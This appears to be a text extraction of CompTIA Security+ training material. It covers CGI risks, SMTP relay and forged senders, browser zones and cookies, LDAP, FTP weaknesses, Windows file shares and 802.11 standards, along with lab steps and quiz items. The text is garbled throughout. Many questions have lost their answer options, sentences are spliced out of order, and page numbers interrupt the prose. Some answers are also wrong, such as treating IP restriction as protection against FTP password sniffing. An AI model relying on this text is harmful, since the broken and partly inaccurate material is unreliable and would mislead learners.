4 Which of the following can perform the CGI scripts tasks? (Choose all that apply.)
A
Search for information Embed malicious macros in a document Collect client data using forms Mail password files to an attacker
B
C D
5 List two precautions that you should take when running CGI scripts.
Answers might include:
Deploy intrusion detection systems (IDS), access list filtering and screening on the
border of the network. clients.
Design and code applications to check the size and content of the input received from the Create different user groups with different permissions and restrict access to the
hierarchical file system based on those groups. environment.
Web security
627
SMTP relay
Explanation Simple Mail Transfer Protocol (SMTP) is the standard Internet protocol for global email communications. A mail client (user) communicates with the mail server using the SMTP protocols TCP port 25 to get e-mail from one place to another. Current versions of SMTP support ASCII and MIME content. With its high utilization across the Internet, SMTP is intentionally designed as a very simple protocol. This also makes it easy to understand and troubleshoot; unfortunately, malicious users can easily exploit this simple design in many ways across the Internet. SMTP spams Third-party SMTP relay is used to transfer messages from one server to another via SMTP. A malicious user could exploit this basic concept and try to hide the real origin of a message by using another server as an SMTP relay. In such a scenario, the attacker can use the relay Internet Mail Service as an agent for unsolicited commercial e-mail (spam), flooding innocent users mailboxes with many copies of the same message. Spam is an attempt to force messages on people who would not otherwise choose to receive them. Before you can understand how spamming is achieved via SMTP relay, its important to understand how SMTP functions. The following code demonstrates the sending of an email message with a programming interface as opposed to using a user-friendly e-mail client such as Eudora. You can actually accomplish this by connecting to TCP port 25 of the SMTP server and executing these commands.
HELO mail.example.com 250 mail.anotherexample.com Hello mail.example.com [172.16.35.44], pleased to meet you MAIL FROM: person1@example.com 250 person1@example.com Sender ok RCPT TO: person2@anotherexample.com 250 person2@anotherexample.com Recipient OK DATA 354 Enter mail, end with "." on a line by itself From: To: 250 OAA08757 Message accepted for delivery
This transaction takes place between two SMTP servers. The sending server executes the bold lines; the nonbold lines are responses from the receiving server. The sending server introduces itself as example.com. The receiving server serves the anotherexample.com domain. MAIL FROM: and RCPT TO: fields indicate the source and the destination of the message. These fields (up until the DATA field) make up the envelope of the message. The DATA field comprises of the body of the message as well as the header fields. The key point is that the only variable needed to deliver the message is the RCPT TO:; a malicious user can forge other variables.
628
CompTIA Security+ Certification Its important to identify the real origin of a spam mail in order to take the necessary action. An e-mail message typically traverses through at least two SMTP servers (the senders and the receivers SMTP servers) before reaching the destination client. As messages voyage to their destination, they get stamped by the intermediate SMTP servers along the way. The stamps generate useful tracking information that can be observed in the mail headers. Careful examination of these mail headers can go a long way in identifying the real source of spam mail. The following text is a typical Received: header from an e-mail message:
From forged-address@example.com Received: from example.com ([172.16.35.44]) by mail.anotherexa mple.com (8.8.5) for <receiver@anotherexample.com>
Although such messages do not issue any alarms per se, careful examination of these messages could unveil mismatches between the IP addresses and the domain names indicated in the header. You could verify this by executing a reverse DNS lookup to find out the domain name that corresponds to the indicated IP address. For instance, in the Received: header above, reverse DNS lookup could reveal that the IP address (172.16.35.44) does not really correspond to the example.com domain. In fact, most modern mail programs have already incorporated this functionality, which generates a Received: header that includes the identity of the attacker. Spam via SMTP relay can lead to loss of bandwidth and hijacked mail servers that might no longer be able to serve their legitimate purpose. Furthermore, mail servers of innocent organizations can be subject to blacklisting due to problems caused by SMTP relay. This might in turn prevent an organization from communicating with other organizations. There are institutions, such as the Open Relay Behavior-Modification System (ORBS) and Mail Abuse Prevention System (MAPS), which provide reporting, cataloging, and testing of e-mail servers configured for SMTP relay. These institutions maintain Realtime Blackhole Lists (RBL) of mail servers with problematic histories. Being blacklisted by these types of organizations can adversely affect a businesss operations. Safeguards Companies might configure their systems so that any mail coming from the blacklisted mail servers are automatically rejected.
629
B-4:
2 It is possible to forge the MAIL FROM: variable within an SMTP message. True or False?
True
630
Exhibit 6-5: Internet Options dialog box with the Security tab activated. Do it!
C-1:
Heres how
1 Switch to Internet Explorer 2 Choose Tools, Internet
Options
631
To set the security level for the zone to Medium. If it is already set to Medium, the Default Level button will be dimmed.
8 Click Close 9 Select Restricted Sites 10 Click Sites Add the following Web sites to the zone:
www.kazaa.com ftp.microsoft.com To configure Restricted Sites to block file downloads in Microsoft Internet Explorer 6.
11 Click Close 12 Click OK 13 In the Internet Explorer Address box, enter www.kazaa.com 14 Enter ftp.microsoft.com Navigate to /Reskit/win2000 15 Right-click ADSizer.exe Select Copy to Folder
A security alert appears. URLs can be redirected, so this is not the best way to block file downloads. To close the Internet Options Window. Notice the Restricted sites icon in the lower right corner of the browser. Kazaa completely fails to load. In the browser's Address field.
632
Do it!
C-2:
B C D
2 Which of the following is a zone that contains Web sites that could potentially cause damage to your system? (Choose all that apply.) A B
C D
3 Which of the following is a zone that contains Web sites that you believe will not cause damage to your system? A B
C
Web security
633
Privacy settings
Explanation One issue many users have with Web browsing is the fact that anyone on the Internet has the ability to write information to their computers hard drive. One example of this ability is the use of cookies. Cookies can be valuable to both the user and the company that deposits them. For example, if you go to an e-commerce site and fill out a form with all your important data, a cookie can be used to remember you. This is helpful because youll not have to enter the data every time you visit the site. While this capability can be very helpful, it can also be a major security risk. With that cookie on your computer, anyone with access to your computer could go to the e-commerce site and purchase goods without your knowledge.
634
Exhibit 6-7: Overriding Privacy settings with Per Site Privacy Actions to allow cookies to a selected site Do it!
C-3:
Heres how
1 Launch Internet Explorer 2 Choose Tools, Internet
Options
3 Activate the Privacy tab Slide the Settings bar up to High 4 Click Edit 5 In the Address of Web Site box, type www.yahoo.com 6 Click Allow Click OK 7 Click OK
Notice that only the domain is added to the Managed Web sites list. To block cookies that do not comply with the W3C P3P. To add Web sites you want to allow to bypass the settings.
Web security 8 In the Address box of your browser, enter www.msn.com 9 In the Privacy message, click OK Double-click the cookie privacy warning in the toolbar
635
10 Click Close 11 In the Internet Explorer Address box, enter www.yahoo.com 12 Choose Tools, Internet
Options Notice the privacy warning is absent.
636
Do it!
C-4:
Reviewing cookies
2 Which of the following Privacy settings will block all cookies without a Compact Privacy Policy? A
B
C D
3 Which of the following Privacy settings is likely to cause some Web pages to fail to load? (Choose all that apply.)
A B C D
Block all cookies High Medium high Medium Low Accept all cookies
E F
Web security
637
638
Do it!
C-5:
Heres how
1 Activate the Advanced tab Scroll down to the Security section and review the settings 2 Activate the Content tab 3 Click AutoComplete Clear Usernames and
passwords on forms
To close the AutoComplete Settings window. To close the Internet Options window.
639
C-6:
Do not save encrypted file to disk Empty Temporary Internet Files folder when browser is closed Use Fortezza Do not save Certificates to disk
C D
2 When you enable the option Empty Temporary Internet Files folder when your browser is closed, it also deletes all cookies. True or false?
False: It does not affect the cookies.
640
Topic B
Topic C
Review questions
1 Signing applets is a technique of adding a _________ __________ to an applet to prove that it came unaltered from a particular trusted source.
digital signature
Sandbox restrictions might prevent the applet from performing required operations on local system resources. True or false?
True
In order to use SSL security in a Web page transaction, what must be used in the Web page URL?
HTTPS
__________________ is an interface specification that allows communications between client programs and Web servers.
CGI
71
72
Directory services
Explanation A directory service provides a database for inventory and administration of every object on the network. The directory service performs the following functions: Records and organizes information about every user account, server, printer, workstation, and file system on the network. Grants users access to applications, files, printers, and other network services anywhere on the network with a single login sequence. Enables the LAN Administrator to track the location and disposition of all network resources. Information gathered for each network resource is stored as an object in the database. Users can query the database using a broad set of criteria (such as name, type of service, or location).
LDAP
Lightweight Directory Access Protocol (LDAP) is a commonly used directory service protocol created by the Internet Engineering Task Force (IETF). It was originally designed to work as a front-end client for X.500 directory services (an ISO and ITU standard that defines how global directories should be structured). X.500 requires the full OSI protocol stack and significant computer resources to operate. In response, LDAP was redesigned as a stripped-down version of X.500. LDAP offers the following features: Hierarchical database structure follows X.500 standards Extensible for use with any X.500-compatible database Provides authentication and authorization services Easily deploys on any client or server Runs over TCP/IP networks Supports most operating systems (platform-independent) LDAPs key advantage is that its a versatile directory system that is standards-based and platform-independent. This has caused LDAP to proliferate to nearly all operating systems and has caused the protocol to be widely adopted for a variety of networking applications (see the following table for a sample of major players in the LDAP market). This protocol runs on TCP/IP, so it can be deployed on most networks.
73
74
LDAP framework
An LDAP directory follows the X.500 hierarchical tree format as shown in Exhibit 7-1. The diagram portrays an inverted tree, with its root at the top and branches extending out from the root. The branches are classified as containers since their sole purpose is to hold or contain other objects. The most elemental units are called leaf objects. Each leaf on the tree describes a single network resource, such as a computer, printer, user, or file system directory.
Directory and file transfer services The following table describes each level of the tree structure:
Level [Root] Description
75
At the top of this inverted tree is the [Root]. Like the root of the file directory tree, this is the highest level you can go within the LDAP structure. The [Root] is created during installation of the first LDAP server on the network and cannot be moved, deleted, or renamed. The Directory tree can have only one [Root]. The Country object, an optional object representing the country of the network, is positioned directly beneath the [Root] object. The next level contains an object called the Organization. The Organization is classified as a container, since its sole purpose is to hold or contain other objects. Organizations typically represent a company or department and are used to store other objects. Every tree must have at least one Organization. Beneath the Organization is another container called the Organizational Unit. Organizational Units typically represent a division, department, workgroup, or project team, and can contain other Organizational Units or leaf objects. Organizational Units are optional in the LDAP hierarchy. Leaf objects are the most elemental unit in the LDAP tree. Each leaf on the tree describes a single network resource. The Directory tree represents each leaf object with an icon that shows what type of resource it is and how it is named.
Country Organization
Organizational Unit
Leaf Objects
Each entry in the directory has a distinguished name (DN) and its own attributes followed by specific values. Each distinguished name must be unique throughout the LDAP directory because it identifies a single network object. An example of the DN of an entry (an individual) stored in a LDAP directory is:
cn=Jonathan Q Public, ou=Information Security Department, o=XYZ Corp, c=United States
Using the following table you can decode the fields in the DN. Jonathan Q Public is the common name of the individual who works in the Information Security Department of XYZ Corp., which is headquartered in the United States.
Abbreviation DN CN OU O C Description Distinguished name Common name Organizational unit Organization Country
76
77
Countermeasures
Extra steps must be taken to secure the LDAP server, including: Apply the latest operating system and application security patches. Remove unneeded services and applications that could potentially present an exploitable vulnerability. Configure strong authentication using Kerberos for LDAP v2 or SASL for LDAP v3. Block LDAP (typically, TCP/UDP ports 389 and 636) at the firewall.
78
Do it!
A-1:
C D
Grants users access to applications, files, printers, and other network services anywhere
on the network with a single login sequence. resources.
Enables the LAN Administrator to track the location and disposition of all network
6 Provide the distinguished name for the following leaf object: Company: Emerald Consulting Department: Information Services Volume: UNIX401_SYSTEM
cn= UNIX401_SYSTEM, ou=Information Services, o=Emerald Consulting
7 SSO is an authentication process in a client/server environment where a user can enter a single username and password and obtain access to more than one application or network resource. True or false?
True
Directory and file transfer services 8 What are some major types of attacks LDAP servers must be secured against? (Choose all that apply.)
A B C
79
710
FTP
Explanation It is obvious to most people who have downloaded files over the Internet that the ability to share programs and data with other people around the world is an essential aspect of the Internet that continues to drive its explosive growth. This is why file transfer is so critical to todays networked organizations. An often-overlooked aspect of this is the security and integrity of the typically secret data that businesses need to exchange over the Internet. As incredible and wonderful as the Internet might be, its a wild and uncontrolled network and poses a number of risks to your businesss data. One of the most commonly used application protocols on the Internet is File Transfer Protocol (FTP). Its also one of the most insecure services in use. The reason it is so commonly used is that most FTP clients and servers are free, distributed with most operating systems, and relatively easy to use. System administrators can easily exchange files with remote offices and business partners over the Internet by setting up an FTP server in a matter of minutes and with no additional cost. The list of vulnerabilities and attacks associated with FTP is a long one. FTP was one of the early TCP/IP applications and was designed without the security features of many current applications. To understand FTPs inherent flaws, one must first understand the mechanism by which FTP authenticates and transfers data between a client and a server. FTP has two standard data transmission methods: active FTP and passive FTP. The terms active and passive refer to the servers roll in setting up the TCP session, as shown in Exhibit 7-2.
711
In both active and passive FTP, the client initiates a TCP session using destination port 21 to the server. This is the command connection and is used for authenticating the user and transferring commands between the client and the server. The command connection operates just as a normal TCP session should: the client initiates a session using a predetermined destination port number on the server (for FTP, this is port 21), and a source port that is a number greater than 1023. The differences in how the two types of FTP operate are in the data connection that is set up when the user wants to transfer data between the two machines. For example, if the user issued FTPs GET command to download a file (the command might take the form get resume.doc to download the file resume.doc), the client sends the get command using the command connection, and then the server negotiates the opening of a second TCP connection to actually transfer the files data. Active FTP In active FTP, which is FTPs default operation, the FTP server creates a data connection by opening a TCP session using a source port of 20 and a destination port greater than 1023. This is contrary to TCPs normal operation in which the destination port of a new session is fixed and the source port is a random high port above 1023. Active FTP is an issue because securitys best practices dictate that connections can be initiated outbound from a trusted network to an untrusted network, but not vice versa. In a situation in which the client sits behind a firewall of an internal trusted network and the server is out on the Internet, active FTP breaks this policy. Active FTP requires that the server initiate a connection inbound to the client to transfer data, as shown in Exhibit 7-3.
Exhibit 7-3: Setup of active FTP data connection Most modern stateful firewalls accommodate this issue by actually watching the negotiation between the client and server and automatically opening the agreed upon port so the client can receive the connection from the server. Simple packet-filtering firewalls do not have this level of intelligence. To permit active FTP using packetfiltering firewalls, one must allow all high ports (because one never knows what port will be negotiated by the client and server) to reach internal clients from outside the trusted networka very dangerous proposition. The situation can be slightly mitigated by only allowing incoming connections from port 20. People seeking to exploit this weakness could easily craft packets from that port as well.
712
CompTIA Security+ Certification Passive FTP In passive FTP, which is not supported by all FTP implementations, the client initiates the data connection to the server (therefore, the server is said to be passive because its only accepting a connection instead of originating one). As shown in Exhibit 7-4, the passive FTP client initiates the data connection to the server with a source and destination port that are both random high ports.
Exhibit 7-4: Setup of the passive FTP data connection This solves the firewall issue just mentioned, because the client initiates both connections, so the client does not violate his own security policy by allowing an inbound connection from the Internet. This opens up a security issue for the FTP server: now the server must allow inbound connections on all high ports in order to accommodate passive FTP data connections. Most stateful firewalls accommodate this by monitoring the control connection to determine which port is used for the data connection, and then opening that single port between the server and the client. The same issue exists for packet-filtering firewalls which are not equipped to look that deeply into the FTP packet; a packet-filtering firewall that is protecting the active FTP server has to be configured to accept all ports to the server in order to accommodate passive FTP.
Directory and file transfer services Clear text authentication and data transmission
713
Another vulnerability lies in the fact that FTP traffic is sent unencrypted in clear text. This includes both the username/password pair and the data itself. Anyone with a packet sniffer can own a copy of the data transferred via FTP, as well as the login information used to obtain it. Glob vulnerability A nonstandard issue with many FTP implementations is that they permit the client to use the (*) wildcard in FTP commands. The wildcard is a very useful tool that allows a user to perform an operation on multiple files at once. For example, the command del ap* causes the files application.doc and apple.pic to be deleted. Hackers can exploit this behavior to create buffer overflows and therefore gain control of the server. This is called the glob vulnerability. Software exploits and buffer overflow vulnerabilities There are many known vulnerabilities associated with various implementations of FTP. For example, a well-documented buffer overflow vulnerability in wu-ftp (a common FTP server implementation) has been responsible for thousands of compromised UNIX and Linux boxes. Anonymous FTP and blind FTP access The practice of setting up anonymous FTP servers across the Internet is extremely common. This originates with an FTP servers default position of allowing anyone authenticating with the username anonymous and any password (good Netizens use their e-mail address as a password) access to a directory on the server. This practice allowed people around the world to easily share data and files with the world without too much overhead or red tape. Many software vendors set up anonymous FTP sites to distribute updates and patches for their products. FTP search engines exist that make finding thousands of anonymous FTP sites quick and easy. The transcript below is from an anonymous FTP session. Information entered by the user appears in bold typeface:
C:\ >ftp leech.stat.umn.edu Connected to leech.stat.umn.edu. 220 leech.stat.umn.edu FTP server (Version wu-2.4.2academ[BETA-18](1) Thu Sep 2 GMT 2001) ready. User (leech.stat.umn.edu:(none)): anonymous 331 Guest login ok, send your complete e-mail address as password. Password: 230-Please read the file README 230- it was last modified on Fri Dec 13 14:14:31 1996 - 2024 days ago 230 Guest login ok, access restrictions apply. ftp>
In the first line of this transcript, the user issued a command to run the FTP client and connect to the site called leech.stat.umn.edu. The user could just as easily have entered the servers IP address. In the second line, you see the connection was successful, and in the following line, the FTP server has provided some basic information about itself. Its running version 2.4.2 of wu-ftp. The server immediately provides the User prompt so the user can log on to it.
714
CompTIA Security+ Certification Here you see the user provided the login of anonymous to get access with visitor privileges. The server has been configured to accept the anonymous login account; it requests the user provide his or her e-mail address as a password, although any string of characters is often accepted by anonymous FTP servers. After the password was entered, the server prints a brief banner message instructing the guest to read the file README. You know the anonymous user credentials were accepted, because the server noted Guest login ok. Finally, you see the ftp> prompt, indicating the user is now able to enter an FTP command. Although properly secured and monitored anonymous FTP sites are a valuable and wellused Internet resource, unmonitored anonymous FTP servers can often be used as storehouses for warez (pirated software with the copy protection mechanisms removed). Pirates use anonymous FTP sites for storage because they often have more bandwidth than their own Internet connections, making it easy to share and trade their warez. Companies that do not monitor their anonymous FTP sites for this type of behavior risk a black eye in the public relations arena if it becomes known that their servers are used for this type of illegal activity. A potentially worse situation could arise if the anonymous account is not properly restricted to access only designated directories. If an anonymous FTP server is misconfigured and permits anonymous visitors to write to any directory, then malicious visitors could upload files that would result in their gaining root access and control of the server. Even if the malicious user could only read any directory, then he could download files containing user passwords and decrypt them using password cracking tools. If you decide to setup an anonymous FTP server, be sure its properly secured. CERT provides a document entitled Anonymous FTP Configuration Guidelines to help in this task. It is available at:
www.cert.org/tech_tips/anonymous_ftp_config.html.
A variant of the anonymous FTP site is a blind FTP site. With blind FTP sites, a user logs on as anonymous, but is then restricted to a single directory and is not able to obtain a listing of files in the directory. Blind FTP sites offer more security than anonymous sites, because the user must know the exact filename of a desired file in order to download it. There is still no way to account for who has logged on to the server and accessed a given file. If a user who is given a particular filename by an administrator chooses to share it with others, then the privacy sought by setting up the blind server is compromised.
715
FTP countermeasures
Its clear from aforementioned issues that FTP is an easy target for hackers. There are, however, solutions to the FTP quandary: Do not allow anonymous access unless a clear business requirement exists to do so. Employ a state-of-the art firewall such as a Cisco PIX or Check Point FireWall1 that performs content inspection of FTP commands. Ensure your FTP server has the latest security patches and that it has been properly configured to limit user access. Encrypt your data before placing it on an FTP server, so it cannot be sniffed in transit to its destination. The recipient needs the appropriate keys to decrypt the data once it has been received. Encrypt the FTP data flow using a Virtual Private Network (VPN) connection. Switch to a secure alternative to FTP, such as the Secure File Transfer Protocol outlined in the next section.
716
Do it!
B-1:
Heres how
Students will work in pairs for this activity.
2 Create a folder called ftp located in the root directory of your system 3 Click Start and then right click
My Computer
5 Expand Internet
Information Services
7 Right-click FTP Sites Choose New, FTP Site 8 Click Next 9 Enter My FTP Site Click Next 10 Click Next 11 Click Next 12 In the path box, type c:\ftp 13 Click Next 14 Check Write Click Next
To keep the default settings for the IP Address and TCP Port Settings. To accept the default of not isolating users. If your root directory is different than c:\, substitute the root directory on your system. The FTP Site Access Permissions screen appears. For the description. The FTP Site Creation Wizard will begin.
717
(To close the Wizard.) Notice that your ftp site is stopped. To start your ftp server, youll have to first stop the Default FTP Site In Computer Management.
718
Requiring authentication
Explanation The default setting for an FTP site is to allow anonymous access; however, there are times when its necessary to control access. The Windows Server 2003 FTP Server service has capabilities to remove anonymous access and require user authentication. The major risk when switching to authentication is that the usernames and passwords are sent in clear text, which can be sniffed with a protocol analyzer.
Do it!
B-2:
Heres how
1 Switch to the Computer Management window and rightclick My FTP Site Choose Properties 2 Activate the Security Accounts tab
Directory and file transfer services 5 Switch to the Command window and enter ftp 6 At the ftp prompt, enter open
<your partners IP address>
719
Make sure both partners have completed step 5 before they continue with step 6. The remainder of the activity might not work correctly.
For the username. For the password. The login will fail because a valid account with a password is required. Anonymous access will no longer be allowed, but there is a risk of having the password sniffed on the network.
9 At the ftp prompt, enter user Enter user1 Enter the password for the User 1 account 10 Enter quit
720
Do it!
B-3:
Heres how
1 Switch to the Computer Management window 2 Activate the Directory Security tab
3 Click Add
Directory and file transfer services 6 Switch to the Command window and at the ftp prompt, enter open
<your partners IP address>
721
Make sure both partners have completed step 5 before they continue with step 6. The remainder of the activity might not work correctly.
7 At the ftp prompt, enter user1 Enter the password for the User 1 account 8 Enter quit 9 Close the Command window 10 When both you and your partner are finished testing the ftp connection, return to the Directory Security tab and remove your partners IP address 11 In Computer Management, stop the My FTP Site and restart the Default FTP Site
To reattempt login. Youll be denied access because your IP address has been denied access. (To end the session.)
Expand Services and Applications, expand Internet Information Services, and expand FTP Sites to stop/start the ftp sites.
12 What are the options available for TCP/IP Access Restrictions? (Choose all that apply.)
A
B
C
Users can logon using the administrator password Users can logon using their password Users can logon using an Anonymous account Users will not be able to access the server
722
S/FTP
The most commonly used Secure File Transfer Protocol (S/FTP) is not a rehash of traditional FTP at all, but is a new component of the Secure Shell (SSH) protocol introduced with SSH version 2 (SSH2). The OpenSSH man page offers the following description of S/FTP: S/FTP is an interactive file transfer program, similar to ftp, which performs all operations over an encrypted ssh transport. It might also use many features of ssh, such as public key authentication and compression. S/FTP connects and logs into the specified host, then enters an interactive command mode. The key words in this quote are similar to ftp, because of the protocols name, Secure FTP, one might expect that S/FTP is a method of securing traditional FTP, but it is not. The only relationship between S/FTP and traditional FTP is that S/FTP employs the older variants command syntax. Rather than a protocol, S/FTP is an FTPlike program provided as part of the SSH suite to securely transfer files. S/FTP does not provide any new network protocols; it only provides an FTP-like user interface to use the existing SSH2 encryption mechanisms to transfer files. Notice that SSHs Secure File Transfer Protocol (S/FTP) should not be confused with the Simple File Transfer Protocol (SFTP) defined in RFC 913. The latter is easier to implement than the original FTP, and the former is not a protocol at all, but a program that leverages SSH to securely transfer files between hosts. Secure Shells S/FTP standard has a number of benefits over traditional FTP: S/FTP uses the underlying SSH2 protocol, so it offers strong authentication using a variety of methods including X.509 certificates. It uses SSH2, S/FTP encrypts authentication, commands, and all data transferred between the client and the server using secure encryption algorithms. SSH2 uses a single, well-behaved TCP connection (as compared to active FTP, which opens a reverse connection, and passive FTP, which opens a connection on a random high port) it is easy to configure a firewall to permit S/FTP communications. S/FTP uses the same TCP port as SSH2, port 22. Traditional FTP clients and servers negotiate the IP address and port for opening the data connection, its difficult to use Network Address Translation (NAT) on FTP connections. S/FTP avoids this issue altogether because no negotiation is required to open a second connection.
Directory and file transfer services The following table displays SecureFTP implementation programs:
Program SSH Note
723
The SSH product produced by the company of the same name, offering both server and client software. http://ssh.com/support/downloads/ An open source version of SSH. http://sshwindows.sourceforge.net/ A freeware SSH client implementation for Windows operating systems. www.chiark.greenend.org.uk/~sgtatham/putty/
OpenSSH PuTTY
724
Do it!
B-4:
3 With blind FTP sites, a user logs on as anonymous, but is then restricted to a single directory and is not able to obtain a listing of files in the directory. True or false?
True
4 In passive FTP, the server initiates the data connection to the client. True or false?
False
5 The terms active and passive in FTP refer to the clients role in setting up the data connection. True or false?
False: It refers to the servers role.
7 Audits for file shares should be conducted in complete secrecy. True or false?
False: Audits should be conducted with management approval, including any required change management sign-offs, and should be carefully documented.
725
File shares
Explanation A common way of sharing files is using file shares on a Microsoft Windows network. This method was originally intended to share files on a local area network (LAN) rather than across the Internet as FTP is used, although current versions of Windows allow mapping via IP connections. File shares are popular because they are easy to set up, and they use the Windows graphical interface. Very little computer knowledge is required for people to share files across the network using file shares; one simply views the files or folder's properties and selects the appropriate check box, as shown in Exhibit 7-5.
Exhibit 7-5: File sharing in Windows Server 2003 Shared files can be configured as peer-to-peer (so that multiple desktop computers can access files on another desktop computer) or as client/server shares (set up to provide users with centralized network storage on a server).
726
Vulnerabilities
Although file shares seem both harmless and indispensable, there are indeed several risks that security administrators need to manage carefully. First, there is the risk of confidentiality of data, because most users control file sharing on their own desktop computers, they can open shares on their machines that could accidentally become liabilities. Take for example an accountant who shares his My Documents folder to let his coworkers access his collection of MP3 music files. If the accountant accidentally saves a spreadsheet containing the salaries of all employees into the same folder, he could inadvertently give confidential information to people who should not have access to it. Second, there are viruses that spread via network shares. If many users on the network have unmonitored and uncontrolled network shares, they can cause malware such as the Funlove virus to spread rapidly, damaging files and causing huge losses to productivity as administrators battle the infection and workers are unable to perform their functions because their programs no longer work. Finally, other types of critical information besides user documents could become compromised if file shares are misconfigured. One example of this is the C: drive on Windows machines. If the entire drive were accidentally shared, then an attacker has the ability to access important files in the C:\Windows directory. In this case, an attacker could launch a denial-of-service attack on the machine by deleting critical files, or could download the SAM file that contains the username and password of everyone who has ever logged onto the machine. After downloading the SAM file, an attacker can crack it using tools such as L0phtCrack.
For more details on how to use these tools and auditing best practices, see Jaime Carpenters article entitled Open File Shares: An Unexpected Business Risk at the SANS Reading Room ( www.sans.org/rr/).
727
C-1:
Can share files on a LAN Can share files over an IP connection Can be configured as peer-to-peer Can be configured as client/server
Sharing confidential data Spreading viruses Compromising system files All of the above
728
Topic B
Topic C
Review questions
1 Information about network resources is stored as a(n) __________ in the directory services database.
object
2 A commonly used directory service protocol that was developed by the IETF is __________.
LDAP
4 PKI, user administration, and single sign-on are some of the applications of LDAP. True or False?
True
5 List the elements in the X.500 hierarchical structure from the top to the bottom.
Root, country, organization, organizational unit, leaf objects
7 LDAP provides authentication and authorization services. It also provides encryption by utilizing other protocols. True or False?
True
8 List the security vulnerabilities you need to protect your LDAP service from.
DoS, man-in-the-middle, and attacks against data confidentiality
729
9 List the steps you can take to secure the LDAP server from the vulnerabilities that can affect it.
Apply the latest OS and application security patches, remove unneeded services and applications, configure strong authentication, block LDAP at the firewall.
10 FTP is one of the most secure services on the Internet. True or False?
False
13 List some of the FTP security issues you should guard against.
Bounce attacks, clear text authentication and data transmission, glob vulnerabilities, software exploits and buffer overflow vulnerabilities, anonymous FTP and blind FTP access.
14 The default settings for an FTP site is to require usernames and passwords. True or False?
False: The default is anonymous access.
15 How can you prevent password sniffing when users are connecting to an FTP server?
Restrict access to the site by IP address. A user trying to access the site would have to provide a valid username and password, and would have to access the site from the appropriate computer.
730
12 On your computer, display properties for the Dangerous folder. Change the permissions for the group Everyone to allow Change. (Activate the Sharing tab, click Permissions, check Change in the Allow column.) 13 On the other computer, try saving the file again. 14 Were you able to save it now?
Yes
15 On the first computer, check the text file for modifications. Next, youll scan your own computer for file shares using Legion. This file can be found under packetstormsecurity.nl/groups/rhino9/. 16 Download the file legionv21.zip according to your instructor's directions. 17 Unzip the file to C:\Security. 18 Run the Setup program Setup.exe. 19 Click Next at the Welcome screen. 20 Click Next at each screen to accept the defaults. Click Finish to exit the installation program. 21 Click Start, then choose All Programs, Legion to run the program. 22 Enter the starting IP address in the Scan from text boxes. 23 Click Scan. 24 What file shares were detected on your computer?
Dangerous should appear in the share list.
25 Close Legion.
81
82
83
802.11a
The IEEE approved the 802.11a standard in 1999 and titled it High-speed Physical Layer in the 5 GHz Band. This standard sets specifications for an additional type of data transmission at the Physical layerthe Coded Orthogonal Frequency Multiplexing (COFDM) protocol. The COFDM layer provides data transmission rates of 6, 9, 12, 18, 24, 36, 48, and 54 Mbpsa major improvement over the 5.5 Mbps or 11 Mbps offered by 802.11b. The radios consist of either wireless NIC cards or wireless access points (APs), and they operate by converting the digital and analog signals between the client and the wired network. Communications are established at the fastest possible data rate, which is dependent upon the distance between the client and network and the strength of the signal. One major benefit of operating in the 5 GHz band is that 802.11a devices do not have to compete with many other devices, such as cordless phones, microwave ovens, and baby monitors (though baby monitors are usually not a problem in a corporate environment).
802.11b
The 802.11b standard was approved in 1999, concurrently with 802.11a. The IEEE named the 802.11b standard the Higher-Speed Layer Extension in the 2.4 GHz Band. The IEEE also established specifications for an additional type of data transmission at the Physical layerthe High-Rate Direct Sequence Spread Spectrum (HR/DSSS) protocol. This protocol allows for data transmission at either 5.5 Mbps or 11 Mbps (which is as fast as standard Ethernet and much faster than most Internet connections) instead of the mandatory 1 Mbps or the optional 2 Mbps data transmission rate offered by the original 802.11 standard. In 2001, the 802.11b standard came under heavy criticism because of security flaws in WEP. The Wireless Ethernet Compatibility Alliance (WECA), an equipment testing and certification group, created a standard based on 802.11b that is dubbed Wi-Fi, a trademark that is short for wireless fidelity.
802.11c
The IEEE working group C was responsible for creating 802.11c, which would develop MAC bridging functionality. This group was folded into the 802.1D standard. 802.1D is focused on MAC bridging in wired LANs and should not be confused with 802.11d.
802.11d
The IEEE working group D is responsible for determining the requirements necessary for 802.11 to operate in other countries and incorporating those requirements into 802.11d. The work of this group continues.
84
802.11e
The IEEE working group E is responsible for creating the 802.11e standard, which will add multimedia and Quality of Service (QoS) capabilities to the MAC layer and therefore guarantee specified data transmission rates and error percentages. This proposal is still in draft form. When this work is completed, it will have a beneficial affect on 802.11a, 802.11b, and 802.11g. The 802.11e standard will also impact 802.15, which is assigned the task of creating wireless personal area networks (Wireless PANs), and 802.16, which is assigned the task of creating Wireless MAN standards. Without an improvement in QoS, many of the benefits of higher rates of data transmission, such as video streaming and wireless Voice over IP (wireless VoIP), will not materialize.
802.11f
The IEEE working group F is responsible for creating the 802.11f standard, which will allow for better roaming between multivendor access points and distribution systems (different LANs within a WAN) than is currently feasible under 802.11.
802.11g
The IEEE working group G created a draft 802.11g standard, was approved in June 2003. This standard offers a raw data throughput rate of up to 54 Mbpsfive times higher than 802.11b. The 802.11g specification is backward compatible with the widely deployed 802.11b standard.
802.11h
The IEEE working group H is responsible for creating 802.11h, which is required to allow for European implementations requests regarding the 5 GHz Physical layer. Two requirements of this standard are that it limits the PC card from emitting more radio signal than is needed and allows devices to listen to radio wave activity before picking a channel on which to broadcast. This standard was approved in 2003.
802.11i
The IEEE working group I is responsible for fixing the serious security flaws in WLANs by developing new security standards. This standard was approved in 2004, however, its apparent that its initial medium-term intent was to create a new standard that would be at least somewhat backward compatible with the original WEP so that a total transformation of existing equipment need not be necessary. This fix will probably involve increasing the number of required bits in the temporal keys to 128, the use of fast packet keying, and key management. In the long term, the working group hopes to eliminate WEP altogether and replace it with what it is calling the Temporal Key Integrity Protocol (TKIP), which would require that keys be replaced within a certain amount of time. As discussed in the WEP section of this unit, WEP does not currently require these keys be replaced at all.
85
802.11j
The IEEE working group J "Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications: 4.9 to 5 GHz Operation in Japan" addresses Japanese government regulations regarding the use of Wireless LANs in the 4.9 and 5 GHz bands in indoor hot spot, fixed outdoor, and nomadic or mobile modes. This was approved in November 2004. A summary of IEEE 802.11 working groups is provided in the following table:
